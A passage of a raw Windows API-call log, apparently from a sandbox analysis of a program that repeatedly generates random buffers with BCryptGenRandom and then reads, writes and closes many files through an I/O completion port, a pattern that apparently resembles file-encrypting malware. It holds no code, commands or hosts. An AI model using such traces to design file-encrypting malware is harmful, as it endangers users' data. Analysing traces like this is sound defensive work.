GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0117.868] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.869] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.869] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0117.869] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.869] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.869] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0117.870] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0117.870] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0117.870] free (_Block=0x77d7a8) [0117.870] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0117.870] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0117.870] free (_Block=0x2071c20) [0117.870] free (_Block=0x2071d30) [0117.870] free (_Block=0x77d8b0) [0117.871] WriteFile (in: hFile=0x340, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0117.871] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0117.881] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.882] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.882] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0117.882] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.882] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.882] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0117.883] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0117.883] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0117.883] free (_Block=0x77d7a8) [0117.883] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0117.883] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0117.883] free (_Block=0x2071c20) [0117.883] free (_Block=0x2071d30) [0117.883] free (_Block=0x77d8b0) [0117.883] WriteFile (in: hFile=0x3bc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0117.884] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0117.894] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.895] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.895] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0117.895] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.896] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.896] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0117.896] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0117.896] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0117.896] free (_Block=0x77d7a8) [0117.896] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0117.896] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0117.897] free (_Block=0x2071c20) [0117.897] free (_Block=0x2071d30) [0117.897] free (_Block=0x77d8b0) [0117.897] WriteFile (in: hFile=0x13c0, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0117.897] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0117.914] CloseHandle (hObject=0x3bc) returned 1 [0117.916] free (_Block=0x3d70450) [0117.916] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0117.953] CloseHandle (hObject=0x13c0) returned 1 [0117.955] free (_Block=0x3e70008) [0117.955] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0117.968] CloseHandle (hObject=0x2f4) returned 1 [0117.969] free (_Block=0x3ef0008) [0117.969] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0117.980] WriteFile (in: hFile=0x3bc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x29a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0117.981] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0117.984] WriteFile (in: hFile=0x81c, lpBuffer=0x3db04f4, nNumberOfBytesToWrite=0x850, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0) returned 0x0 [0117.984] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0118.053] ReadFile (in: hFile=0x2f4, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0xfc0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0118.053] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0118.062] CloseHandle (hObject=0x340) returned 1 [0118.064] free (_Block=0x1ff1e60) [0118.064] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0118.089] ReadFile (in: hFile=0x81c, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0118.090] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0118.099] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1bac, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0118.109] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0118.116] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.116] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.117] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0118.117] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.117] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.117] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0118.121] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0118.121] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0118.121] free (_Block=0x77d7a8) [0118.121] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0118.121] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0118.122] free (_Block=0x2071c20) [0118.122] free (_Block=0x2071d30) [0118.122] free (_Block=0x77d8b0) [0118.122] WriteFile (in: hFile=0x3bc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0118.122] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0118.249] WriteFile (in: hFile=0x340, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x1bc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0118.257] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0118.257] WriteFile (in: hFile=0x81c, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x480, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0118.257] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0118.314] WriteFile (in: hFile=0x3bc, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x1cb0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0118.314] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0118.329] ReadFile (in: hFile=0x340, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x1780, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0118.342] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0118.410] CloseHandle (hObject=0x81c) returned 1 [0118.411] free (_Block=0x1ff1e60) [0118.421] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0118.422] WriteFile (in: hFile=0x3bc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0xa90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0118.422] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0118.640] CloseHandle (hObject=0x308) returned 1 [0118.645] free (_Block=0x3df0008) [0118.645] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0118.653] WriteFile (in: hFile=0x3bc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x1370, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0118.653] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0118.664] CloseHandle (hObject=0x13c0) returned 1 [0118.668] free (_Block=0x1ff1e60) [0118.668] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0118.677] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.677] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.677] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0118.677] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.678] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.678] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0118.678] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0118.678] calloc (_Count=0x41, _Size=0x4) returned 0x77d7a8 [0118.678] free (_Block=0x3e305b8) [0118.678] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b8 [0118.678] calloc (_Count=0x82, _Size=0x4) returned 0x2071c20 [0118.678] free (_Block=0x77d8b8) [0118.678] free (_Block=0x2071c20) [0118.679] free (_Block=0x77d7a8) [0118.679] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0118.679] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0118.688] WriteFile (in: hFile=0x2f4, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x5b10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0118.688] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0118.700] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x3dec, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0118.716] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0118.725] WriteFile (in: hFile=0x3bc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0xb10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0118.725] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0118.740] ReadFile (in: hFile=0x2f4, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10ca8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0118.750] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0118.761] CloseHandle (hObject=0x2f4) returned 1 [0118.773] free (_Block=0x3ef0008) [0118.773] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0118.776] ReadFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x486, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0118.776] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0118.845] WriteFile (in: hFile=0x3bc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0118.845] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0118.854] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.855] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.855] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0118.855] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.856] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.856] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0118.856] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0118.856] calloc (_Count=0x41, _Size=0x4) returned 0x77d7a8 [0118.856] free (_Block=0x3e305b8) [0118.856] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b8 [0118.856] calloc (_Count=0x82, _Size=0x4) returned 0x2071c20 [0118.857] free (_Block=0x77d8b8) [0118.857] free (_Block=0x2071c20) [0118.857] free (_Block=0x77d7a8) [0118.857] WriteFile (in: hFile=0x2f4, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0118.857] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0118.871] CloseHandle (hObject=0x308) returned 1 [0118.876] free (_Block=0x1ff1e60) [0118.876] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0118.883] CloseHandle (hObject=0x2f4) returned 1 [0118.888] free (_Block=0x3e70008) [0118.888] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0118.892] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.892] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.892] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0118.892] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.893] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.893] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0118.893] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0118.893] calloc (_Count=0x41, _Size=0x4) returned 0x77d7a8 [0118.893] free (_Block=0x3e305b8) [0118.893] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b8 [0118.893] calloc (_Count=0x82, _Size=0x4) returned 0x2071c20 [0118.894] free (_Block=0x77d8b8) [0118.894] free (_Block=0x2071c20) [0118.894] free (_Block=0x77d7a8) [0118.894] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0118.894] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0118.903] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.904] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.904] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0118.904] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.905] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.905] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0118.905] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0118.905] calloc (_Count=0x41, _Size=0x4) returned 0x77d858 [0118.905] free (_Block=0x3e305b8) [0118.905] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0118.905] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0118.906] free (_Block=0x2071c20) [0118.906] free (_Block=0x2071d30) [0118.906] free (_Block=0x77d858) [0118.906] WriteFile (in: hFile=0x2f4, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0118.906] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0118.921] ReadFile (in: hFile=0x2f4, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x2b8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: 